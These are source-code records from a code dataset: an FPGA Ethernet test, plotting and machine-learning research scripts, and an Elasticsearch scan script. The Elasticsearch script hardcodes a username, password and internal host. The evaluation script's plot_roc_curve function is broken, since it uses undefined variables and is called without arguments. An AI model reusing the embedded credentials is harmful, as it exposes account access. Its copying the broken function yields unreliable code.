fifo_data = self.dut['SITCP_FIFO'].get_data()\n except Exception as e:\n logging.error(e)\n self.tcp_exception_cnt += 1\n else:\n if fifo_data.shape[0]:\n self.total_tcp_data_words_read += fifo_data.shape[0]\n if fifo_data[0] != fifo_data_last_value + 1:\n logging.warning(\"TCP not increased by 1 between readouts\")\n self.total_tcp_err_cnt += 1\n err_cnt = np.count_nonzero(np.diff(fifo_data) != 1)\n if err_cnt:\n logging.warning(\"TCP data not increased by 1: errors=%d\" % err_cnt)\n self.total_tcp_err_cnt += err_cnt\n fifo_data_last_value = fifo_data[-1]\n elif self.stop_thread.is_set():\n fifo_was_empty += 1\n if self.stop_thread.is_set():\n time.sleep(max(0.0, self.tcp_readout_delay - time_read + time.time()))\n logging.info(\"Stopping TCP thread...\")\n\n def bus_read_write(self):\n logging.info(\"Started BUS thread\")\n time_read = time.time()\n while not self.stop_thread.wait(max(0.0, self.bus_readout_delay - time_read + time.time())):\n time_read = time.time()\n write_value = int(np.random.randint(2**64, size=None, dtype=np.uint64)) # random.randint(0, 2**64 - 1)\n try:\n self.dut['REGISTERS'].TEST_DATA = write_value\n except Exception as e:\n logging.error(e)\n self.bus_exception_cnt += 1\n else:\n try:\n read_value = self.dut['REGISTERS'].TEST_DATA\n except Exception as e:\n 
logging.error(e)\n self.bus_exception_cnt += 1\n else:\n self.total_bus_read_write_cnt += 1\n if read_value != write_value:\n logging.warning(\"BUS data not correct: read: %s, expected: %s\" % (array('B', struct.unpack(\"BBBBBBBB\", struct.pack(\"Q\", read_value))), array('B', struct.unpack(\"BBBBBBBB\", struct.pack(\"Q\", write_value)))))\n self.total_bus_err_cnt += 1\n logging.info(\"Stopping BUS thread...\")\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='Testing MMC3 Ethernet Interface %s\\nExample: python test_eth.py -t 1.0 -d 6 --no-bus', formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-w', '--deadline', type=float, metavar='', action='store', help='timeout in seconds before application exits')\n parser.add_argument('-i', '--interval', type=float, metavar='', action='store', help='time interval in seconds for the monitor')\n parser.add_argument('-d', '--delay', type=int, metavar='', action='store', help='clock cycles between TCP writes')\n parser.add_argument('--no-bus', dest='no_bus', action='store_true', help='disable BUS tests')\n parser.add_argument('--no-tcp', dest='no_tcp', action='store_true', help='disable TCP downstream tests')\n parser.set_defaults(no_m26_jtag_configuration=False)\n args = parser.parse_args()\n\n config = {}\n\n if args.deadline is not None:\n config[\"deadline\"] = args.deadline\n if args.interval is not None:\n config[\"monitor_interval\"] = args.interval\n if args.delay is not None:\n config[\"tcp_write_delay\"] = args.delay\n if args.no_bus:\n config[\"test_bus\"] = False\n if args.no_tcp:\n config[\"test_tcp\"] = False\n\n test = Test()\n test.start(**config)\n","repo_name":"SiLab-Bonn/basil","sub_path":"examples/test_eth/test_eth.py","file_name":"test_eth.py","file_ext":"py","file_size_in_byte":15195,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"27615336757","text":"import pickle\nfrom datetime import datetime\nfrom typing import List\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as mtrans\nimport numpy as np\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Rectangle\n\nfrom guidance.recurring_pattern import Pattern\nfrom model.mouse_event_record import MouseEventType\nfrom model.state import State, Severity, Action, Session\n\n\ndef myplot(x, y, bins):\n heatmap, xedges, yedges = np.histogram2d(x, y, bins=bins)\n return heatmap.T\n\n\ndef bounding_box(matrix, x_scale, y_scale):\n rows = np.any(matrix, axis=1)\n cols = np.any(matrix, axis=0)\n x_min, x_max = np.where(cols)[0][[0, -1]]\n y_min, y_max = np.where(rows)[0][[0, -1]]\n x_min = x_min * x_scale\n x_max = x_max * x_scale\n y_min = y_min * y_scale\n y_max = y_max * y_scale\n return (x_min, y_min), x_max - x_min, y_max - y_min\n\n\ndef pattern_class_to_string(pattern_class: int):\n if pattern_class == 0:\n return 'Overview of label classes'\n elif pattern_class == 1:\n return 'Variants of normal curves'\n elif pattern_class == 2:\n return 'Variants of warning curves'\n elif pattern_class == 3:\n return 'Variants of error curves'\n\n\ndef colorForSeverity(severity: Severity):\n if severity == Severity.okay:\n return 'tab:green'\n if severity == Severity.warning:\n return 'tab:orange'\n return 'tab:red'\n\n\ndef visualize_state_list(states: List[State], actions: List[Action], pattern_class: int, i):\n num_rows = len(states)\n num_cols = max([len(state.charts) for state in states])\n\n fig, axes = 
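The BUS mismatch log above renders a 64-bit register value as individual bytes with struct and array. The conversion on its own; "Q" uses native byte order, so on x86 the least significant byte comes first:

import struct
from array import array

write_value = 0x1122334455667788
print(array('B', struct.unpack("BBBBBBBB", struct.pack("Q", write_value))))
# array('B', [136, 119, 102, 85, 68, 51, 34, 17]) on a little-endian machine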
plt.subplots(nrows=num_rows, ncols=num_cols, figsize=(num_cols * 6, num_rows * 4), dpi=400)\n fig.suptitle(pattern_class_to_string(pattern_class), fontsize=24)\n axes_to_remove = []\n legend_lines = []\n legend_names = []\n legend_names.append('voltage')\n legend_lines.append(Line2D([0], [0], color='tab:cyan', lw=4))\n legend_names.append('current')\n legend_lines.append(Line2D([0], [0], color='tab:olive', lw=4))\n for row in range(num_rows):\n state = states[row]\n num_charts = len(state.charts)\n for column in range(num_cols):\n if column < num_charts:\n chart = state.charts[column]\n if len(chart.data) == 0:\n continue\n # x = np.arange(0, len(chart.data[0]), 1)\n if num_cols == 1:\n ax = axes[row]\n else:\n ax = axes[row, column]\n if column == 0:\n ax.set_ylabel(f'State: {row + 1}\\nAction: {actions[row].type} {actions[row].parameters}')\n ax2 = ax.twinx()\n ax2.get_xaxis().set_major_formatter(\n matplotlib.ticker.FuncFormatter(lambda x, p: f\"{datetime.fromtimestamp(x).second}.{int(datetime.fromtimestamp(x).microsecond / 1000)}\")\n )\n y_dim = 60\n x_values = []\n for idx, chart_data in enumerate(chart.data):\n data = list(zip(*chart_data))\n x_values = [float(date) for date in data[0]]\n y_values = list(data[1])\n if idx == 0:\n ax.plot(x_values, y_values, 'tab:cyan', linewidth=1)\n else:\n ax2.plot(x_values, y_values, 'tab:olive', linewidth=1)\n for label in chart.labels:\n labels_xs = []\n for idx, date in enumerate(x_values):\n if label.start <= date <= label.end:\n labels_xs.append(date)\n if not labels_xs:\n continue\n ax.fill_between(labels_xs, 0, 1, color=colorForSeverity(label.label_class.severity), alpha=0.2, transform=ax.get_xaxis_transform())\n if label.label_class.name not in legend_names:\n legend_names.append(label.label_class.name)\n legend_lines.append(Line2D([0], [0], color=colorForSeverity(label.label_class.severity), alpha=0.5, lw=4))\n xs = [x_values[0], x_values[-1]]\n ys = [0.0, 60.0]\n for event in chart.events:\n if event.type is MouseEventType.mousemove or event.type is MouseEventType.mouseover:\n xs.append(event.x * (x_values[-1] - x_values[0]) + x_values[0])\n ys.append(y_dim * event.y)\n bins = 50\n H = myplot(xs, ys, bins)\n H_masked = np.ma.masked_array(H, H < 3)\n if H_masked.any():\n x_scale = (x_values[-1] - x_values[0]) / bins\n y_scale = 60.0 / bins\n origin, width, height = bounding_box(H_masked, x_scale, y_scale)\n adj_origin = (origin[0] + x_values[0], origin[1])\n # Create a Rectangle patch\n rect = Rectangle(adj_origin, width, height, linewidth=1, edgecolor='b', facecolor='none', zorder=2)\n # Add the patch to the Axes\n ax.add_patch(rect)\n else:\n axes_to_remove.append(axes[row, column])\n\n # Get the bounding boxes of the axes including text decorations\n r = fig.canvas.get_renderer()\n get_bbox = lambda ax: ax.get_tightbbox(r).transformed(fig.transFigure.inverted())\n bboxes = np.array(list(map(get_bbox, axes.flat)), mtrans.Bbox).reshape(axes.shape)\n\n # Get the minimum and maximum extent, get the coordinate half-way between those\n if num_cols == 1:\n ymax = np.array(list(map(lambda b: b.y1, bboxes.flat))).reshape(axes.shape)\n ymin = np.array(list(map(lambda b: b.y0, bboxes.flat))).reshape(axes.shape)\n else:\n ymax = np.array(list(map(lambda b: b.y1, bboxes.flat))).reshape(axes.shape).max(axis=1)\n ymin = np.array(list(map(lambda b: b.y0, bboxes.flat))).reshape(axes.shape).min(axis=1)\n ys = np.c_[ymax[1:], ymin[:-1]].mean(axis=1)\n # Draw a horizontal lines at those coordinates\n for y in ys:\n line = plt.Line2D([0, 1], [y, y], 
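visualize_state_list() above overlays two differently scaled series on one chart via ax.twinx() and shades label spans over the full plot height by mixing data x-coordinates with axes y-coordinates. Both tricks in a self-contained sketch:

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax2 = ax.twinx()  # second y-axis sharing the x-axis (voltage vs. current above)
ax.plot([0, 1, 2], [0.2, 0.8, 0.5], "tab:cyan")
ax2.plot([0, 1, 2], [5.0, 3.0, 4.0], "tab:olive")
# x in data coordinates, y in axes coordinates (0..1): the band spans the full height
ax.fill_between([0.5, 1.5], 0, 1, color="tab:orange", alpha=0.2,
                transform=ax.get_xaxis_transform())
plt.show()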
transform=fig.transFigure, color=\"lightgray\")\n fig.add_artist(line)\n\n for axe in axes_to_remove:\n axe.remove()\n\n plt.figlegend(legend_lines, legend_names, loc=(0.8, 0.8))\n plt.savefig(f'fig{i}.png')\n plt.show()\n\n\ndef visualize_eda_session(adapted_patterns: List[Session], patterns: List[Pattern]):\n i = 7\n for adapted_pattern, pattern in zip(adapted_patterns, patterns):\n visualize_state_list(adapted_pattern.states, adapted_pattern.actions, pattern.pattern_class, i)\n i += 1\n\n\nif __name__ == '__main__':\n with open(\"../data/metalarcwelding/interaction/adapted_patterns.pkl\", \"rb\") as f:\n adapted_patterns: List[List[State]] = pickle.load(f)\n\n with open(\"../data/metalarcwelding/interaction/classified_patterns.pkl\", \"rb\") as f:\n patterns: List[Pattern] = pickle.load(f)\n\n visualize_eda_session(adapted_patterns, patterns)\n","repo_name":"tmdt-buw/gideon-core","sub_path":"visualization/maw_visualization.py","file_name":"maw_visualization.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34190581772","text":"import copy\nimport torch\nimport sys\nimport logging\nfrom tqdm import tqdm\nsys.path.append(\"..\")\nfrom helpers.utils import *\nfrom helpers.metrics import *\nfrom baselines.basemethod import BaseSurrogateMethod\n\n\neps_cst = 1e-8\n\n\n\nclass RealizableSurrogate(BaseSurrogateMethod):\n def surrogate_loss_function(self, outputs, hum_preds, data_y):\n \"\"\" Implementation of our RealizableSurrogate loss function\n \"\"\"\n human_correct = (hum_preds == data_y).float()\n human_correct = torch.tensor(human_correct).to(self.device)\n batch_size = outputs.size()[0] # batch_size\n outputs_exp = torch.exp(outputs)\n new_loss = -torch.log2(\n (\n human_correct * outputs_exp[range(batch_size), -1]\n + outputs_exp[range(batch_size), data_y]\n )\n / (torch.sum(outputs_exp, dim=1) + eps_cst)\n ) # pick the values corresponding to the labels\n ce_loss = -torch.log2(\n (outputs_exp[range(batch_size), data_y])\n / (torch.sum(outputs_exp[range(batch_size), :-1], dim=1) + eps_cst)\n )\n loss = self.alpha * new_loss + (1 - self.alpha) * ce_loss\n return torch.sum(loss) / batch_size\n\n # fit with hyperparameter tuning over alpha\n def fit_hyperparam(\n self,\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs,\n optimizer,\n lr,\n verbose=True,\n test_interval=5,\n scheduler=None,\n alpha_grid=[0, 0.1, 0.3, 0.5, 0.9, 1],\n ):\n # np.linspace(0,1,11)\n best_alpha = 0\n best_acc = 0\n model_dict = copy.deepcopy(self.model.state_dict())\n for alpha in tqdm(alpha_grid):\n self.alpha = alpha\n self.model.load_state_dict(model_dict)\n self.fit(\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs = epochs,\n optimizer = optimizer,\n lr = lr,\n verbose = verbose,\n test_interval = test_interval,\n scheduler = scheduler,\n )[\"system_acc\"]\n accuracy = compute_deferral_metrics(self.test(dataloader_val))[\"system_acc\"]\n logging.info(f\"alpha: {alpha}, accuracy: {accuracy}\")\n if accuracy > best_acc:\n best_acc = accuracy\n best_alpha = alpha\n self.alpha = best_alpha\n self.model.load_state_dict(model_dict)\n fit = self.fit(\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs = epochs,\n optimizer = optimizer,\n lr = lr,\n verbose = verbose,\n test_interval = test_interval,\n scheduler = scheduler,\n )\n test_metrics = compute_deferral_metrics(self.test(dataloader_test))\n return 
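bounding_box() above locates the dense mouse-activity region by projecting the masked histogram onto each axis with np.any and taking the first and last True index via np.where. The core idea on a toy mask:

import numpy as np

mask = np.zeros((6, 8), dtype=bool)
mask[2:4, 3:6] = True
rows = np.any(mask, axis=1)            # which rows contain any True
cols = np.any(mask, axis=0)            # which columns contain any True
y_min, y_max = np.where(rows)[0][[0, -1]]
x_min, x_max = np.where(cols)[0][[0, -1]]
print((x_min, y_min), (x_max, y_max))  # (3, 2) (5, 3)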
test_metrics\n","repo_name":"clinicalml/human_ai_deferral","sub_path":"methods/realizable_surrogate.py","file_name":"realizable_surrogate.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"12828804965","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 12 21:23:30 2019\n\n@author: Ryan\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing as pp\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n#from xgboost import XGBClassifier\n#from xgboost import plot_importance\nfrom matplotlib import pyplot\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nbill_data = pd.read_csv(\"prepared_data.csv\")\n#Remove the row number\nbill_data = bill_data.drop([\"Unnamed: 0\"], axis=1)\n\n# Label Encode!!\nle = pp.LabelEncoder()\nbill_data['Made_Law'] = le.fit_transform(bill_data['Made_Law'])\nbill_data['Revised_SoP'] = le.fit_transform(bill_data['Revised_SoP'])\nbill_data['Amended'] = le.fit_transform(bill_data['Amended'])\nbill_data['Started_House_Or_Senate'] = le.fit_transform(bill_data['Started_House_Or_Senate'])\nbill_data['Summary_Length'] = le.fit_transform(bill_data['Summary_Length'])\n#bill_data['cost'] = le.fit_transform(bill_data['cost'])\nbill_data['No_Cost'] = le.fit_transform(bill_data['No_Cost'])\n\n#print(bill_data)\n\n\n# Convert to target and data sets\ntargets = bill_data.Made_Law.values\ndata = bill_data.drop([\"Made_Law\"], axis=1).values\n\ndata_train, data_test, target_train, target_test_expected = train_test_split(data, targets, test_size=.20)\n\n\ndef getAccuracy(expected, actual):\n numberThatAreCorrect = 0\n for i in range(len(expected)):\n if expected[i] == actual[i]:\n numberThatAreCorrect = numberThatAreCorrect + 1\n \n return round((numberThatAreCorrect / len(expected)) * 100, 2)\n\ndef runMachineLearningAlgorithm(classifierArray, expected, training_data, training_targets, testing_data):\n for classifier in classifierArray:\n classifier.fit(training_data, training_targets)\n target_test_actual = classifier.predict(testing_data)\n print(\"{}: {}%\".format(type(classifier), getAccuracy(expected, target_test_actual)))\n return\n\n\nclassifiers = []\nclassifiers =[GaussianNB(), KNeighborsClassifier(), GradientBoostingClassifier(), MLPClassifier(), MLPClassifier(hidden_layer_sizes= [3, 2]), DecisionTreeClassifier()]\n\nrunMachineLearningAlgorithm(classifiers, target_test_expected, data_train, target_train, data_test)\n\n\n\n\n#xgBoostClassifier = XGBClassifier()\n#xgBoostClassifier.fit(data_train, target_train)\n#plot_importance(xgBoostClassifier)\n#pyplot.show()\n\n","repo_name":"gewondjan/idaho-law-machine-learn","sub_path":"gradient-boosted-machine.py","file_name":"gradient-boosted-machine.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33974432285","text":"from __future__ import print_function\n\nimport numpy as np\n\nfrom explauto.utils.config import make_configuration\n\nfrom dataset import BufferedDataset\n \nfrom interest_model import MiscRandomInterest\n\n\nclass LearningModule(object):\n def __init__(self, mid, m_space, s_space, max_steps, env_conf,\n explo_noise=0.05, motor_babbling_n_iter=10,\n optim_explo=None, 
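surrogate_loss_function() above exponentiates raw logits with torch.exp, which can overflow for large logit values. Below is a numerically stable rewrite of the same quantity built on torch.logsumexp; it is an equivalent-in-exact-arithmetic sketch, not the repository's implementation:

import math

import torch

def realizable_surrogate_loss(outputs, hum_preds, data_y, alpha):
    # outputs: (B, K+1) logits, last column is the defer option
    idx = torch.arange(outputs.size(0))
    human_correct = hum_preds == data_y
    # log(1[human correct]*exp(o_defer) + exp(o_y)) via logsumexp; -inf drops the defer term
    defer = torch.where(human_correct, outputs[:, -1],
                        torch.full_like(outputs[:, -1], float("-inf")))
    num = torch.logsumexp(torch.stack([outputs[idx, data_y], defer], dim=1), dim=1)
    new_loss = -(num - torch.logsumexp(outputs, dim=1)) / math.log(2)
    ce = -(outputs[idx, data_y] - torch.logsumexp(outputs[:, :-1], dim=1)) / math.log(2)
    return (alpha * new_loss + (1 - alpha) * ce).mean()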
end_point=False):\n\n \n self.mid = mid\n self.m_space = m_space\n self.s_space = s_space\n self.n_mdims = len(self.m_space)\n self.n_sdims = len(self.s_space)\n self.max_steps = max_steps\n self.env_conf = env_conf\n self.explo_noise = explo_noise\n self.motor_babbling_n_iter = motor_babbling_n_iter\n self.optim_explo = optim_explo\n self.end_point = end_point\n \n self.s = None\n self.sg = None\n self.last_interest = 0\n self.t = 0\n \n \n # Sensorimotor Model\n conf = make_configuration(list(env_conf.m_mins[m_space]) * self.max_steps,\n list(env_conf.m_maxs[m_space]) * self.max_steps,\n list(np.array(list(env_conf.m_mins[m_space]) + list(env_conf.s_mins))[s_space]) * self.max_steps,\n list(np.array(list(env_conf.m_maxs[m_space]) + list(env_conf.s_maxs))[s_space]) * self.max_steps)\n \n self.sm = BufferedDataset(conf.m_ndims, \n conf.s_ndims,\n buffer_size=10000, # Size of a small kdtree buffer to update this one often and move the data to the big kdtree less often \n lateness=100) # The model can be \"late\" by this number of points: they are not yet taken into account (added to the small kdtree)\n \n\n if self.end_point:\n self.sm_end = BufferedDataset(conf.m_ndims, \n len(s_space),\n buffer_size=10000,\n lateness=100)\n \n self.interest_model = MiscRandomInterest(conf, \n conf.s_dims[-self.n_sdims:], \n self.n_sdims, \n win_size=200)\n else:\n self.interest_model = MiscRandomInterest(conf, \n conf.s_dims, \n self.n_sdims, \n win_size=200)\n \n \n \n def motor_babbling(self, steps=None):\n return np.random.random(self.n_mdims * self.max_steps) * 2. - 1.\n \n def inverse(self, sg, explore=True, log=False):\n # Get nearest neighbor\n if len(self.sm):\n if self.end_point:\n _, idx = self.sm_end.nn_y(sg[-len(self.s_space):])\n m = np.array(self.sm_end.get_x(idx[0]))\n snn = self.sm.get_y(idx[0])\n else:\n _, idx = self.sm.nn_y(sg)\n m = np.array(self.sm.get_x(idx[0]))\n snn = self.sm.get_y(idx[0])\n else:\n return self.motor_babbling()\n # Add Exploration Noise\n if explore:\n if self.optim_explo == \"gaussian\" or self.optim_explo == \"random\":\n # Detect Movement\n snn_steps = len(snn) // self.n_sdims\n move_step = snn_steps\n for i in range(1, snn_steps):\n if abs(snn[self.n_sdims * i] - snn[self.n_sdims * (i-1)]) > 0.01:\n #Move at step i\n move_step = i\n break\n # Explore after Movement detection\n if move_step == 1 or move_step == snn_steps:\n start_explo = 0\n else:\n start_explo = move_step\n \n if self.optim_explo == \"gaussian\":\n explo_vect = [0.] * start_explo * self.n_mdims + [self.explo_noise]*(snn_steps-start_explo) * self.n_mdims\n m = np.random.normal(m, explo_vect).clip(-1.,1.)\n else:\n rdm = 2. 
* np.random.random(self.max_steps * self.n_mdims) - 1.\n m[start_explo * self.n_mdims:] = rdm[start_explo * self.n_mdims:]\n \n elif self.optim_explo == \"full\":\n explo_vect = [self.explo_noise]*len(m)\n m = np.random.normal(m, explo_vect).clip(-1.,1.)\n else:\n raise NotImplementedError\n return m\n \n def produce(self):\n if self.t < self.motor_babbling_n_iter:\n self.m = self.motor_babbling()\n self.sg = None\n else:\n self.sg = self.interest_model.sample()\n self.m = self.inverse(self.sg)\n return self.m \n \n def update_sm(self, m, s):\n if s[1] != s[-1]:\n self.sm.add_xy(m, s)\n if self.end_point:\n self.sm_end.add_xy(m, s[-len(self.s_space):])\n self.t += 1 \n \n def update_im(self, m, s):\n if self.t > self.motor_babbling_n_iter:\n if self.end_point:\n return self.interest_model.update(self.sg[-len(self.s_space):], s[-len(self.s_space):])\n else:\n return self.interest_model.update(self.sg, s)\n \n def interest(self): return self.interest_model.current_interest\n\n def perceive(self, m, s):\n self.update_sm(m, s)\n\n def get_m(self, ms): return ms[self.m_space]\n def get_s(self, ms): return ms[self.s_space]\n ","repo_name":"sebastien-forestier/IMGEP","sub_path":"2DSimulation/learning_module.py","file_name":"learning_module.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42958790190","text":"# %% Trained Model evaluation functions\n\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom sklearn.metrics import mean_squared_error, classification_report, precision_recall_curve, roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\nimport config\nfrom dataset.dataset_loader import get_train_and_test_X_y\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import make_scorer\nimport matplotlib.pyplot as plt\n\n\n# %%\ndef get_rmse(clf, X_test, y_test):\n predictions = clf.predict(X_test)\n mse = mean_squared_error(y_test, predictions)\n return np.sqrt(mse)\n\n\ndef get_multiple_rmse(models, X, y, sample_sizes):\n \"\"\"Calculates rmse for multiple samples sizes and for multiple models.\n models: a dictionary with pairs model_name(string): model (sklearn estimator)\n sample_sizes: list of integers\n returns: pandas dataframe with all the rmses. Rows are sizes, columns are models\"\"\"\n data = {clf_name.title(): [get_rmse(clf, X.sample(size), y.sample(size)) for size in sample_sizes]\n for clf_name, clf in models.items()}\n df_rmse = pd.DataFrame(data, index=sample_sizes)\n df_rmse.name = \"Root mean squared error\"\n df_rmse.index.name = \"num samples\"\n return df_rmse\n\n\ndef print_cross_val_scores(clf, X, y, scoring, cv=5):\n scores = cross_val_score(clf, X, y, scoring=scoring, cv=cv)\n print(\"Scores: \", scores)\n print(\"Mean: \", scores.mean())\n print(\"Standard deviation: \", scores.std())\n\n\ndef get_multiple_cross_val_scores(models, X, y, score, cv=5):\n \"\"\"Calculates a cross validation score for multiple classifier models.\n models: a dictionary with pairs model_name(string): model (sklearn estimator)\n scoring: 'accuracy', 'precision', 'roc_auc'... Takes only one value of those\n (https://scikit-learn.org/stable/modules/model_evaluation.html#scoring-parameter)\n returns: pandas dataframe with all the rmses. 
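inverse() in learning_module.py resolves a sensory goal by nearest-neighbour lookup in the kd-tree-backed BufferedDataset and then perturbs the retrieved motor command. A brute-force sketch of the 'full' exploration mode, with plain arrays standing in for the buffered kd-tree:

import numpy as np

def nn_inverse_full_explo(dataset_m, dataset_s, goal_s, explo_noise=0.05, rng=None):
    rng = rng if rng is not None else np.random.default_rng()
    # nearest stored outcome to the goal ...
    dists = np.linalg.norm(np.asarray(dataset_s) - np.asarray(goal_s), axis=1)
    m = np.asarray(dataset_m[int(np.argmin(dists))], dtype=float)
    # ... plus Gaussian exploration noise on every motor dimension, clipped to [-1, 1]
    return np.clip(rng.normal(m, explo_noise), -1.0, 1.0)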
Rows are sizes, columns are models\n\n Note: High score values are better than low values\"\"\"\n data = {model_name: [cross_val_score(model, X, y, scoring=score, cv=cv).mean()] for model_name, model in\n models.items()}\n return pd.DataFrame(data, index=['mean'])\n\n\ndef tp(y_true, y_pred):\n return confusion_matrix(y_true, y_pred)[1, 1]\n\n\ndef save_fig(figures_dir, figure_id, tight_layout=True, ):\n path = os.path.join(figures_dir, figure_id + \".png\")\n print(\"Saving figure\", figure_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format='png', dpi=300)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\", linewidth=2)\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\", linewidth=2)\n plt.xlabel(\"Threshold\", fontsize=16)\n plt.legend(loc=\"upper left\", fontsize=16)\n plt.ylim([0, 1])\n\n\ndef plot_precision_vs_recall(precisions, recalls):\n plt.plot(recalls, precisions, \"b-\", linewidth=2)\n plt.xlabel(\"Recall\", fontsize=16)\n plt.ylabel(\"Precision\", fontsize=16)\n plt.axis([0, 1, 0, 1])\n\ndef plot_roc_curve(y_train, y_scores):\n fpr, tpr, thresholds = roc_curve(y_train, y_scores[model_name])\n plt.figure()\n lw = 2\n plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc_score(y_train, y_scores))\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"roc_curve_plot\")\n plt.show()\n\n\n# %% Set script configuration\nprint(f\"Working directory: {os.getcwd()}\")\npath_to_root = \"../\"\nif os.getcwd().endswith(\"InteractionsClassification\"):\n os.chdir(os.getcwd() + \"\\\\src\")\nsearch_path = os.getcwd().replace(f\"\\classification\", \"\")\nif search_path not in sys.path:\n sys.path.append(search_path)\nfor path in sys.path:\n print(path)\nfigures_path = path_to_root + \"figures/\"\nprint(\"Figures saved to: \", figures_path)\nmodels_path = path_to_root + \"models/tuned/\"\n\n# %% Read the dataset and split train and test\nX_train, X_test, y_train, y_test = get_train_and_test_X_y(path_to_root)\n\n# %% Read models\nselected_names = [\n \"stochastic gradient descent classifier\",\n \"random forest classifier\",\n # \"k nearest neighbors classifier\",\n # \"radius neighbors classifier\",\n \"gaussian naive bayes\",\n \"never functional\",\n # \"support vector classifier\"\n]\nmodels = {model_name: joblib.load(models_path + model_name.replace(\" \", \"_\") + \".pkl\") for model_name in selected_names}\n\n# %% Calculate prediction scores\ny_scores = {}\nfor model_name, model in models.items():\n if model_name == \"stochastic gradient descent classifier\":\n y_scores[model_name] = model.decision_function(X_train)\n else:\n y_scores[model_name] = model.predict_proba(X_train)\n\n# %% Basic evaluation: Root mean squared error\nsample_sizes = [5, 100, 1000, 10000]\ndf_rmse = get_multiple_rmse(models, pd.DataFrame(X_train), pd.DataFrame(y_train), sample_sizes)\ndf_rmse\n\n# %% ## Show confussion matrix\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n y_pred = cross_val_predict(model, X_train, y_train, cv=config.cv)\n print(confusion_matrix(y_train, y_pred))\n\n# %% Cross-Validation: Accuracy\nprint(f\"Cross-validation for 
'accuracy':\")\nget_multiple_cross_val_scores(models, X_train, y_train, 'accuracy', config.cv)\n\n# %% Cross-Validation: Precision\nprint(f\"Cross-validation for 'precision':\")\nget_multiple_cross_val_scores(models, X_train, y_train, 'precision')\n\n# %% Cross-Validation: True positives\nprint(f\"Cross-validation for 'true positive':\")\nget_multiple_cross_val_scores(models, X_train, y_train, make_scorer(tp))\n\n# %%\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n y_pred = model.predict(X_train)\n # Print the precision, recall and f1-score for micro, macro and weighted avg for each class\n print(classification_report(y_train, y_pred, target_names=['non-functional', 'functional']))\n\n\n# %% Show precision-recall vs threshold curve and precision vs recall curve\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n precisions, recalls, thresholds = precision_recall_curve(y_train, y_scores[model_name])\n\n # Precision recall vs threshold curve\n plt.figure(figsize=(8, 4))\n plot_precision_recall_vs_threshold(precisions, recalls, thresholds)\n plt.xlim([-550, 550])\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"_precision_recall_vs_threshold_plot\")\n plt.show()\n\n # Precision vs recall curve\n plt.figure(figsize=(8, 4))\n plot_precision_vs_recall(precisions, recalls)\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"_precision_vs_recall_plot\")\n plt.show()\n\n# %% Show ROC curve\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import roc_auc_score\n\nfor model_name, model in models.items():\n plot_roc_curve()\n\n# %% Show ROC AUC scores\nprint(\"-- ROC AUC scores\")\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}: {roc_auc_score(y_train, y_scores[model_name])}\")\n","repo_name":"LuisFranciscoHS/InteractionsClassification","sub_path":"src/Python/classification/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888218404","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 11 11:59:55 2018\n\n@author: fangyucheng\n\"\"\"\n\nimport json\nimport time\nimport elasticsearch\nimport elasticsearch.helpers\n\nhosts = '192.168.17.11'\nport = 80\nuser_id = 'fangyucheng'\npassword = 'VK0FkWf1fV8f'\nhttp_auth = (user_id, password)\n\nes = elasticsearch.Elasticsearch(hosts=hosts, port=port, http_auth=http_auth)\n\ntask_list = []\nresult_list = []\n\nes_scan = elasticsearch.helpers.scan(es, index='target_releasers')\n\nfor line in es_scan:\n task_list.append(line)\nprint('the length of releaser is %s' % len(task_list))\n\nbulk_all_body = ''\ncount = 0\nfor line in task_list:\n releaser_info = line['_source']\n platform = 